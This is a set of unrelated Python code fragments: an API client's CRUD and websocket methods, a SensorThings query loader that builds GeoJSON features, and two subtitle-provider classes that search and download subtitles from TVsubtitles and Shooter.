self.handleresult(self.r.post(urljoin(self.url + "query/", query_type), data=json.dumps(query))).json() def create(self, path, data=None): """Send a POST CRUD API request to the given path using the given data which will be converted to json""" return self.handleresult(self.r.post(urljoin(self.url + CRUD_PATH, path), data=json.dumps(data))) def read(self, path, params=None): """Read the result at the given path (GET) from the CRUD API, using the optional params dictionary as url parameters.""" return self.handleresult(self.r.get(urljoin(self.url + CRUD_PATH, path), params=params)) def update(self, path, data=None): """Send an update request to the given path of the CRUD API, with the given data dict, which will be converted into json""" return self.handleresult(self.r.put(urljoin(self.url + CRUD_PATH, path), data=json.dumps(data))) def delete(self, path): """Send a delete request to the given path of the CRUD API. This deletes the object. Or at least tries to.""" return self.handleresult(self.r.delete(urljoin(self.url + CRUD_PATH, path))) def get(self, path, params=None): """Sends a get request to the given path in the database and with optional URL parameters""" return self.handleresult(self.r.get(urljoin(self.url, path), params=params)) def subscribe(self, stream, callback, transform=""): """Subscribe to the given stream with the callback""" return self.ws.subscribe(stream, callback, transform) def unsubscribe(self, stream, transform=""): """Unsubscribe from the given stream""" return self.ws.unsubscribe(stream, transform) def wsdisconnect(self): """Disconnects the websocket""" self.ws.disconnect()
def _load(self, offset=0, limit=10, resulttype='results', identifier=None, bbox=[], datetime_=None, properties=[], sortby=[], select_properties=[], skip_geometry=False, q=None): """ Private function: Load STA data :param offset: starting record to return (default 0) :param limit: number of records to return (default 10) :param resulttype: return results or hit limit (default results) :param bbox: bounding box [minx,miny,maxx,maxy] :param datetime_: temporal (datestamp or extent) :param properties: list of tuples (name, value) :param sortby: list of dicts (property, order) :param select_properties: list of property names :param skip_geometry: bool of whether to skip geometry (default False) :param q: full-text search term(s) :returns: dict of GeoJSON FeatureCollection """ feature_collection = {'type': 'FeatureCollection', 'features': []} # Make params params = { '$expand': EXPAND[self.entity], '$skip': str(offset), '$top': str(limit), '$count': 'true' } if properties or bbox or datetime_: params['$filter'] = self._make_filter(properties, bbox, datetime_) if sortby: params['$orderby'] = self._make_orderby(sortby) # Start session s = Session() # Form URL for GET request LOGGER.debug('Sending query') if identifier: r = s.get(f'{self._url}({identifier})', params=params) else: r = s.get(self._url, params=params) if r.status_code == codes.bad: LOGGER.error('Bad http response code') raise ProviderConnectionError('Bad http response code') response = r.json() # if hits, return count if resulttype == 'hits': LOGGER.debug('Returning hits') feature_collection['numberMatched'] = response.get('@iot.count') return feature_collection # Query if values are less than expected v = [ response, ] if identifier else response.get('value') hits_ = 1 if identifier else min(limit, response.get('@iot.count')) while len(v) < hits_: LOGGER.debug('Fetching next set of values') next_ = response.get('@iot.nextLink', None) if next_ is None: break else: with s.get(next_) as r: response = r.json() v.extend(response.get('value')) # End session s.close() # Properties filter & display keys = (() if not self.properties and not select_properties else set(self.properties) | set(select_properties)) for entity in v[:hits_]: # Make feature id = entity.pop(self.id_field) id = f"'{id}'" if isinstance(id, str) else str(id) f = { 'type': 'Feature', 'properties': {}, 'geometry': None, 'id': id } # Make geometry if not skip_geometry: f['geometry'] = self._geometry(entity) # Fill properties block try: f['properties'] = self._expand_properties(entity, keys) except KeyError as err: LOGGER.error(err) raise ProviderQueryError(err) feature_collection['features'].append(f) feature_collection['numberReturned'] = len( feature_collection['features']) if identifier: return f else: return feature_collection
class TVsubtitlesProvider(Provider): languages = {Language('por', 'BR')} | {Language(l) for l in [ 'ara', 'bul', 'ces', 'dan', 'deu', 'ell', 'eng', 'fin', 'fra', 'hun', 'ita', 'jpn', 'kor', 'nld', 'pol', 'por', 'ron', 'rus', 'spa', 'swe', 'tur', 'ukr', 'zho' ]} video_types = (Episode,) server_url = 'http://www.tvsubtitles.net/' def initialize(self): self.session = Session() self.session.headers['User-Agent'] = 'Subliminal/%s' % __short_version__ def terminate(self): self.session.close() @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def search_show_id(self, series, year=None): """Search the show id from the `series` and `year`. :param str series: series of the episode. :param year: year of the series, if any. :type year: int or None :return: the show id, if any. :rtype: int or None """ # make the search logger.info('Searching show id for %r', series) r = self.session.post(self.server_url + 'search.php', data={'q': series}, timeout=10) r.raise_for_status() # get the series out of the suggestions soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) show_id = None for suggestion in soup.select('div.left li div a[href^="/tvshow-"]'): match = link_re.match(suggestion.text) if not match: logger.error('Failed to match %s', suggestion.text) continue if match.group('series').lower() == series.lower(): if year is not None and int(match.group('first_year')) != year: logger.debug('Year does not match') continue show_id = int(suggestion['href'][8:-5]) logger.debug('Found show id %d', show_id) break return show_id @region.cache_on_arguments(expiration_time=EPISODE_EXPIRATION_TIME) def get_episode_ids(self, show_id, season): """Get episode ids from the show id and the season. :param int show_id: show id. :param int season: season of the episode. :return: episode ids per episode number. :rtype: dict """ # get the page of the season of the show logger.info('Getting the page of show id %d, season %d', show_id, season) r = self.session.get(self.server_url + 'tvshow-%d-%d.html' % (show_id, season), timeout=10) soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) # loop over episode rows episode_ids = {} for row in soup.select('table#table5 tr'): # skip rows that do not have a link to the episode page if not row('a', href=episode_id_re): continue # extract data from the cells cells = row('td') episode = int(cells[0].text.split('x')[1]) episode_id = int(cells[1].a['href'][8:-5]) episode_ids[episode] = episode_id if episode_ids: logger.debug('Found episode ids %r', episode_ids) else: logger.warning('No episode ids found') return episode_ids def query(self, series, season, episode, year=None): # search the show id show_id = self.search_show_id(series, year) if show_id is None: logger.error('No show id found for %r (%r)', series, {'year': year}) return [] # get the episode ids episode_ids = self.get_episode_ids(show_id, season) if episode not in episode_ids: logger.error('Episode %d not found', episode) return [] # get the episode page logger.info('Getting the page for episode %d', episode_ids[episode]) r = self.session.get(self.server_url + 'episode-%d.html' % episode_ids[episode], timeout=10) soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) # loop over subtitles rows subtitles = [] for row in soup.select('.subtitlen'): # read the item language = Language.fromtvsubtitles(row.h5.img['src'][13:-4]) subtitle_id = int(row.parent['href'][10:-5]) page_link = self.server_url + 'subtitle-%d.html' % subtitle_id rip = row.find('p', title='rip').text.strip() or None release = row.find('p', title='release').text.strip() or None subtitle = TVsubtitlesSubtitle(language, page_link, subtitle_id, series, season, episode, year, rip, release) logger.debug('Found subtitle %s', subtitle) subtitles.append(subtitle) return subtitles def list_subtitles(self, video, languages): return [s for s in self.query(video.series, video.season, video.episode, video.year) if s.language in languages] def download_subtitle(self, subtitle): # download as a zip logger.info('Downloading subtitle %r', subtitle) r = self.session.get(self.server_url + 'download-%d.html' % subtitle.subtitle_id, timeout=10) r.raise_for_status() # open the zip with ZipFile(io.BytesIO(r.content)) as zf: if len(zf.namelist()) > 1: raise ProviderError('More than one file to unzip') subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
class ShooterProvider(Provider): languages = {Language.fromalpha2(l) for l in ["zh"]} required_hash = "shooter" def initialize(self): self.session = Session() self.session.headers = {"User-Agent": "SPlayer Build 2437"} def terminate(self): self.session.close() def query(self, hash): # shooter has many DNS mirrors, e.g. splayer[1-9], but one is enough params = {"pathinfo": "temp", "format": "json", "filehash": hash} logger.info("Searching subtitles %r", params) r = self.session.get("https://www.shooter.cn/api/subapi.php", params=params, timeout=10) r.raise_for_status() # loop over, server always returns found or not subtitles = [] try: for it in r.json(): # It normally contains one File, but can contain multiple link = it["Files"][0]["Link"] subtype = it["Files"][0]["Ext"] subtitle = ShooterSubtitle(Language.fromalpha2("zh"), hash, link, subtype) logger.debug("Found subtitle %r", subtitle) subtitles.append(subtitle) return subtitles except: logger.debug("No subtitle found") return [] def list_subtitles(self, video, languages): return [s for s in self.query(video.hashes["shooter"]) if s.language in languages] def download_subtitle(self, subtitle): logger.info("Download subtitle %r", subtitle.link) r = self.session.get(subtitle.link, params=None, timeout=10) r.raise_for_status() subtitle.content = fix_line_ending(r.content)